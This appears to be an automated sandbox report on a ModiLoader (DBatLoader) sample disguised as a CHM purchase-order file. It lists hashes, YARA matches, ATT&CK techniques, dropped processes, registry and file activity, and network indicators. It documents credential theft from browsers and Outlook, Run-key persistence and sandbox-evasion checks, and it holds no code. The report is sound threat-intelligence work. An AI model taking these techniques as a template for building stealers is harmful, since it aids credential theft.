modiloader | 5ce8a7ef07cbd67618627078f820dae2c0f9e29a4113e498c7aefd1c39b3ad33

Analysis

max time kernel
150s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20-01-2025 10:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PO_095709_0485685_MQ1940_Order_Specifications.chm
Size

75KB
MD5

98191ac03cddd697bed63b0eab761bed
SHA1

9ea831063cbdccf9de4b79e195800cac9d5518ad
SHA256

5ce8a7ef07cbd67618627078f820dae2c0f9e29a4113e498c7aefd1c39b3ad33
SHA512

7313ac3423e2e68e42c58a04b6b945b5b0e6ff1c8aea91fb145cca927d19b0be54b2cb174ef6a8434970b41ed539ce295da6b8246844ddbf3b5735a7b77f4a7d
SSDEEP

1536:pbN0IxCKVgZpisZ1MJ0cifP4R232WJniFPurASPDuP/V6McEJh:ZGIkgI1gNi44TJiFP8ASS8ML

Score

10^/10

modiloader collection defense_evasion discovery execution persistence spyware stealer trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modiloader family
modiloader

ModiLoader Second Stage 61 IoCs

resource	yara_rule
behavioral2/memory/2436-50-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-53-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-55-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-60-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-68-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-80-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-100-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-99-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-112-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-111-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-109-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-108-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-107-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-106-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-104-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-103-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-101-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-98-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-97-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-96-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-94-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-93-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-92-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-90-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-113-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-110-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-87-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-85-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-84-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-105-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-82-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-81-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-102-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-79-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-78-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-77-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-95-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-76-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-75-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-91-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-74-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-89-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-88-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-73-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-72-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-86-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-71-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-70-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-69-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-67-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-66-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-65-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-59-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-64-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-63-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-62-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-61-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-58-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-57-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-54-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2436-56-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4360	powershell.exe
2052	powershell.exe

Executes dropped EXE 32 IoCs

pid	Process
1380	ript.exe
2436	x.exe
4956	svchost.pif
1456	alpha.pif
3820	Upha.pif
5036	alpha.pif
2920	Upha.pif
3032	alpha.pif
4076	aken.pif
2720	ezaitqoJ.pif
1836	alg.exe
5480	DiagnosticsHub.StandardCollector.Service.exe
5628	fxssvc.exe
5796	elevation_service.exe
5884	elevation_service.exe
5988	maintenanceservice.exe
6084	msdtc.exe
4808	OSE.EXE
1656	PerceptionSimulationService.exe
908	perfhost.exe
2744	locator.exe
3480	SensorDataService.exe
5208	snmptrap.exe
5424	spectrum.exe
4984	ssh-agent.exe
2288	TieringEngineService.exe
4552	AgentService.exe
2432	vds.exe
5024	vssvc.exe
916	wbengine.exe
2984	WmiApSrv.exe
64	SearchIndexer.exe

Loads dropped DLL 1 IoCs

pid	Process
4956	svchost.pif

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	ezaitqoJ.pif
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	ezaitqoJ.pif
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	ezaitqoJ.pif

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Joqtiaze = "C:\\Users\\Public\\Joqtiaze.url"	x.exe

Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
4572	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
28	drive.google.com
30	drive.google.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
54	checkip.dyndns.org
73	reallyfreegeoip.org
74	reallyfreegeoip.org

Drops file in System32 directory 24 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\alg.exe	ezaitqoJ.pif
File opened for modification	C:\Windows\system32\dllhost.exe	ezaitqoJ.pif
File opened for modification	C:\Windows\System32\snmptrap.exe	ezaitqoJ.pif
File opened for modification	C:\Windows\system32\spectrum.exe	ezaitqoJ.pif
File opened for modification	C:\Windows\system32\AgentService.exe	ezaitqoJ.pif
File opened for modification	C:\Windows\system32\wbengine.exe	ezaitqoJ.pif
File opened for modification	C:\Windows\system32\AppVClient.exe	ezaitqoJ.pif
File opened for modification	C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	ezaitqoJ.pif
File opened for modification	C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe	ezaitqoJ.pif
File opened for modification	C:\Windows\system32\locator.exe	ezaitqoJ.pif
File opened for modification	C:\Windows\System32\SensorDataService.exe	ezaitqoJ.pif
File opened for modification	C:\Windows\system32\vssvc.exe	ezaitqoJ.pif
File opened for modification	C:\Windows\system32\wbem\WmiApSrv.exe	ezaitqoJ.pif
File opened for modification	C:\Windows\system32\SearchIndexer.exe	ezaitqoJ.pif
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\703b48b699262766.bin	alg.exe
File opened for modification	C:\Windows\system32\msiexec.exe	ezaitqoJ.pif
File opened for modification	C:\Windows\system32\MSDtc\MSDTC.LOG	msdtc.exe
File opened for modification	C:\Windows\system32\SgrmBroker.exe	ezaitqoJ.pif
File opened for modification	C:\Windows\system32\TieringEngineService.exe	ezaitqoJ.pif
File opened for modification	C:\Windows\System32\vds.exe	ezaitqoJ.pif
File opened for modification	C:\Windows\system32\fxssvc.exe	ezaitqoJ.pif
File opened for modification	C:\Windows\System32\msdtc.exe	ezaitqoJ.pif
File opened for modification	C:\Windows\SysWow64\perfhost.exe	ezaitqoJ.pif
File opened for modification	C:\Windows\System32\OpenSSH\ssh-agent.exe	ezaitqoJ.pif

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2436 set thread context of 2720	2436	x.exe	118

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Internet Explorer\ieinstal.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\pack200.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\xjc.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\rmid.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\VideoLAN\VLC\vlc.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\AcroLayoutRecognizer.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Internet Explorer\ielowutil.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\idlj.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\keytool.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\rmiregistry.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\kinit.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\extcheck.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\kinit.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\ktab.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\jjs.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\ktab.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jre-1.8\bin\pack200.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files (x86)\Internet Explorer\iexplore.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jjs.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Mozilla Firefox\uninstall\helper.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_87484\javaws.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\javaw.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jre-1.8\bin\rmiregistry.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jre-1.8\bin\ssvagent.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\UnregisterRequest.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jrunscript.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\wsimport.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\keytool.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jre-1.8\bin\javaws.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jre-1.8\bin\jjs.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdate.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files (x86)\Internet Explorer\ExtExport.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javah.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javaws.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jconsole.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\orbd.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jre-1.8\bin\jabswitch.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jre-1.8\bin\tnameserv.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files (x86)\Internet Explorer\ieinstal.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jhat.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\tnameserv.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jre-1.8\bin\java.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files (x86)\Internet Explorer\ielowutil.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\notification_helper.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\orbd.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\serialver.exe	ezaitqoJ.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\rmiregistry.exe	ezaitqoJ.pif

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe	ezaitqoJ.pif
File opened for modification	C:\Windows\DtcInstall.log	msdtc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ezaitqoJ.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	x.exe

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	spectrum.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	spectrum.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	spectrum.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	SensorDataService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	SensorDataService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	spectrum.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SensorDataService.exe
